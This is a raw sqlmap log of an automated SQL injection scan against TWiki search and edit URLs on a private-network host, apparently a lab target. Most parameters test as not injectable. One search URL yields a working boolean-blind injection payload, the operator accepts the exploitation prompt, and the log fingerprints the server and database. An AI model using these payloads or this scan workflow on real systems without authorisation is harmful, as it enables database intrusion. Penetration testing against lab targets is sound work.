GET http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=\.*
do you want to test this URL? [Y/n/q]
> Y
[20:22:17] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=\.*'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[20:22:17] [INFO] testing connection to the target URL
[20:22:17] [INFO] testing if the target URL is stable
[20:22:18] [INFO] target URL is stable
[20:22:18] [INFO] testing if URI parameter '#1*' is dynamic
[20:22:18] [INFO] confirming that URI parameter '#1*' is dynamic
[20:22:18] [INFO] URI parameter '#1*' is dynamic
[20:22:18] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[20:22:18] [INFO] testing for SQL injection on URI parameter '#1*'
[20:22:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:22:18] [WARNING] reflective value(s) found and filtering out
[20:22:19] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:22:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:22:20] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:22:21] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:22:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:22:22] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:22:22] [INFO] testing 'MySQL inline queries'
[20:22:22] [INFO] testing 'PostgreSQL inline queries'
[20:22:22] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:22:22] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:22:22] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:22:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:22:23] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:22:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:22:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:22:25] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:22:25] [INFO] testing 'Oracle AND time-based blind'
[20:22:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:22:26] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:22:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:22:36] [WARNING] URI parameter '#1*' is not injectable
[20:22:36] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 195:
GET http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=^a
do you want to test this URL? [Y/n/q]
> Y
[20:22:36] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=^a'
[20:22:36] [INFO] testing connection to the target URL
[20:22:37] [INFO] testing if the target URL is stable
[20:22:38] [INFO] target URL is stable
[20:22:38] [INFO] testing if GET parameter 'scope' is dynamic
[20:22:38] [WARNING] GET parameter 'scope' does not appear dynamic
[20:22:38] [WARNING] heuristic (basic) test shows that GET parameter 'scope' might not be injectable
[20:22:38] [INFO] testing for SQL injection on GET parameter 'scope'
[20:22:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:22:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:22:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:22:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:22:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:22:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:22:41] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:22:41] [INFO] testing 'MySQL inline queries'
[20:22:41] [INFO] testing 'PostgreSQL inline queries'
[20:22:41] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:22:41] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:22:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:22:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:22:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:22:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:22:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:22:44] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:22:44] [INFO] testing 'Oracle AND time-based blind'
[20:22:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:22:45] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:22:51] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:22:56] [WARNING] GET parameter 'scope' is not injectable
[20:22:56] [INFO] testing if GET parameter 'regex' is dynamic
[20:22:57] [WARNING] GET parameter 'regex' does not appear dynamic
[20:22:57] [WARNING] heuristic (basic) test shows that GET parameter 'regex' might not be injectable
[20:22:57] [INFO] testing for SQL injection on GET parameter 'regex'
[20:22:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:22:58] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:22:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:22:59] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:22:59] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:23:00] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:23:00] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:23:00] [INFO] testing 'MySQL inline queries'
[20:23:00] [INFO] testing 'PostgreSQL inline queries'
[20:23:00] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:23:00] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:23:01] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:23:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:23:02] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:23:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:23:03] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:23:03] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:23:04] [INFO] testing 'Oracle AND time-based blind'
[20:23:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:23:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:23:16] [WARNING] GET parameter 'regex' is not injectable
[20:23:16] [INFO] testing if GET parameter 'search' is dynamic
[20:23:16] [WARNING] GET parameter 'search' does not appear dynamic
[20:23:16] [WARNING] heuristic (basic) test shows that GET parameter 'search' might not be injectable
[20:23:16] [INFO] testing for SQL injection on GET parameter 'search'
[20:23:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:23:16] [WARNING] reflective value(s) found and filtering out
[20:23:17] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:23:17] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:23:18] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:23:18] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:23:19] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:23:19] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:23:20] [INFO] testing 'MySQL inline queries'
[20:23:20] [INFO] testing 'PostgreSQL inline queries'
[20:23:20] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:23:20] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:23:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:23:21] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:23:21] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:23:22] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:23:22] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:23:23] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:23:23] [INFO] testing 'Oracle AND time-based blind'
[20:23:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:23:29] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:23:35] [WARNING] GET parameter 'search' is not injectable
[20:23:35] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=^b'
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=^c'
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=^d'
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=^e'
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=^f'
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=^g'
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=^h'
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=^i'
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=^j'
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=^k'
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=^l'
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=^m'
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=^n'
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=^o'
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=^p'
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=^q'
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=^r'
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=^s'
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=^t'
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=^u'
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=^v'
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=^w'
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=^x'
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=^y'
[20:23:35] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&search=^z'
URL 196:
GET http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&bookview=on&search=\.*
do you want to test this URL? [Y/n/q]
> Y
[20:23:35] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/Sandbox/?scope=topic&regex=on&bookview=on&search=\.*'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[20:23:35] [INFO] testing connection to the target URL
[20:23:36] [INFO] testing if the target URL is stable
[20:23:37] [INFO] target URL is stable
[20:23:37] [INFO] testing if URI parameter '#1*' is dynamic
[20:23:37] [INFO] confirming that URI parameter '#1*' is dynamic
[20:23:37] [INFO] URI parameter '#1*' is dynamic
[20:23:37] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[20:23:37] [INFO] testing for SQL injection on URI parameter '#1*'
[20:23:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:23:37] [WARNING] reflective value(s) found and filtering out
[20:23:38] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:23:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:23:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:23:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:23:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:23:41] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:23:41] [INFO] testing 'MySQL inline queries'
[20:23:41] [INFO] testing 'PostgreSQL inline queries'
[20:23:41] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:23:41] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:23:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:23:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:23:42] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:23:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:23:43] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:23:44] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:23:44] [INFO] testing 'Oracle AND time-based blind'
[20:23:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:23:45] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:23:51] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:23:56] [WARNING] URI parameter '#1*' is not injectable
[20:23:56] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 197:
GET http://192.168.1.113:80/twiki/bin/edit/Sandbox/WebSearch?t=1441457856
do you want to test this URL? [Y/n/q]
> Y
[20:23:56] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Sandbox/WebSearch?t=1441457856'
[20:23:56] [INFO] testing connection to the target URL
[20:23:57] [INFO] testing if the target URL is stable
[20:23:57] [INFO] target URL is stable
[20:23:57] [INFO] testing if GET parameter 't' is dynamic
[20:23:57] [WARNING] GET parameter 't' does not appear dynamic
[20:23:58] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable
[20:23:58] [INFO] testing for SQL injection on GET parameter 't'
[20:23:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:23:59] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:23:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:23:59] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:24:00] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:24:00] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:24:01] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:24:01] [INFO] testing 'MySQL inline queries'
[20:24:01] [INFO] testing 'PostgreSQL inline queries'
[20:24:01] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:24:01] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:24:02] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:24:02] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:24:02] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:24:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:24:03] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:24:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:24:04] [INFO] testing 'Oracle AND time-based blind'
[20:24:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:24:05] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:24:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:24:16] [WARNING] GET parameter 't' is not injectable
[20:24:16] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 198:
GET http://192.168.1.113:80/twiki/bin/search/Sandbox/SearchResult?scope=text&regex=on&search=Web *Search[^A-Za-z]
do you want to test this URL? [Y/n/q]
> Y
[20:24:16] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/Sandbox/SearchResult?scope=text&regex=on&search=Web *Search[^A-Za-z]'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[20:24:16] [INFO] testing connection to the target URL
[20:24:16] [INFO] testing if the target URL is stable
[20:24:17] [INFO] target URL is stable
[20:24:17] [INFO] testing if URI parameter '#1*' is dynamic
[20:24:17] [WARNING] URI parameter '#1*' does not appear dynamic
[20:24:17] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[20:24:17] [INFO] testing for SQL injection on URI parameter '#1*'
[20:24:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:24:17] [WARNING] reflective value(s) found and filtering out
[20:24:19] [INFO] URI parameter '#1*' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[20:24:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:24:19] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:24:19] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:24:19] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:24:19] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:24:19] [INFO] testing 'MySQL inline queries'
[20:24:19] [INFO] testing 'PostgreSQL inline queries'
[20:24:19] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:24:19] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:24:19] [WARNING] time-based comparison requires larger statistical model, please wait......
[20:24:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:24:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:24:20] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:24:20] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:24:20] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:24:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:24:20] [INFO] testing 'Oracle AND time-based blind'
[20:24:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:24:20] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:24:20] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:24:22] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[20:24:24] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
[20:24:25] [WARNING] it appears that the character '>' is filtered by the back-end server. You are strongly advised to rerun with the '--tamper=between'
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 84 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://192.168.1.113:80/twiki/bin/search/Sandbox/SearchResult?scope=text&regex=on&search=Web AND 2722=2722-- hRzySearch[^A-Za-z]
---
do you want to exploit this SQL injection? [Y/n] Y
[20:24:25] [INFO] testing MySQL
[20:24:25] [WARNING] the back-end DBMS is not MySQL
[20:24:25] [INFO] testing Oracle
[20:24:25] [WARNING] the back-end DBMS is not Oracle
[20:24:25] [INFO] testing PostgreSQL
[20:24:25] [WARNING] the back-end DBMS is not PostgreSQL
[20:24:25] [INFO] testing Microsoft SQL Server
[20:24:25] [INFO] confirming Microsoft SQL Server
[20:24:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: Apache 2.2.8
back-end DBMS: active fingerprint: Microsoft SQL Server 2012
SQL injection vulnerability has already been detected against '192.168.1.113'. Do you want to skip further tests involving it? [Y/n] Y
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Sandbox/WebSearch?skin=print'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Sandbox/WebSearch?rev1=1.7&rev2=1.6'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Sandbox/WebSearch?rev=1.6'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Sandbox/WebSearch?rev1=1.6&rev2=1.5'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Sandbox/WebSearch?rev=1.5'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/oops/Sandbox/WebSearch?template=oopsmore&param1=1.7&param2=1.7'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=text&regex=on&search=TopicClassification.*NoDisclosure'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=text&regex=on&search=TopicClassification.*PublicFAQ'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=text&regex=on&search=TopicClassification.*PublicSupported'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=text&regex=on&search=OperatingSystem.*OsHPUX'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=text&regex=on&search=OperatingSystem.*OsLinux'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=text&regex=on&search=OperatingSystem.*OsSolaris'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=text&regex=on&search=OperatingSystem.*OsSunOS'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=text&regex=on&search=OperatingSystem.*OsMacOS'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=text&regex=on&search=OperatingSystem.*OsWin'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic&regex=on&search=\.*'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic&regex=on&search=^a'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic&regex=on&search=^b'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic&regex=on&search=^c'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic&regex=on&search=^d'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic&regex=on&search=^e'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic&regex=on&search=^f'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic&regex=on&search=^g'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic&regex=on&search=^h'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic&regex=on&search=^i'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic&regex=on&search=^j'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic&regex=on&search=^k'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic&regex=on&search=^l'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic&regex=on&search=^m'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic&regex=on&search=^n'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic&regex=on&search=^o'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic&regex=on&search=^p'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic&regex=on&search=^q'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic&regex=on&search=^r'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic&regex=on&search=^s'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic&regex=on&search=^t'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic&regex=on&search=^u'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic&regex=on&search=^v'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic&regex=on&search=^w'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic&regex=on&search=^x'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic&regex=on&search=^y'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic&regex=on&search=^z'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic&regex=on&bookview=on&search=\.*'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/edit/Know/WebSearch?t=1441457923'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/SearchResult?scope=text&regex=on&search=Web *Search[^A-Za-z]'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Know/WebSearch?skin=print'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Know/WebSearch?rev1=1.10&rev2=1.9'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Know/WebSearch?rev=1.9'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Know/WebSearch?rev1=1.9&rev2=1.8'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Know/WebSearch?rev=1.8'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/oops/Know/WebSearch?template=oopsmore&param1=1.10&param2=1.10'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic&regex=on&search=\.*'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic&regex=on&search=^a'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic&regex=on&search=^b'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic&regex=on&search=^c'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic&regex=on&search=^d'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic&regex=on&search=^e'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic&regex=on&search=^f'
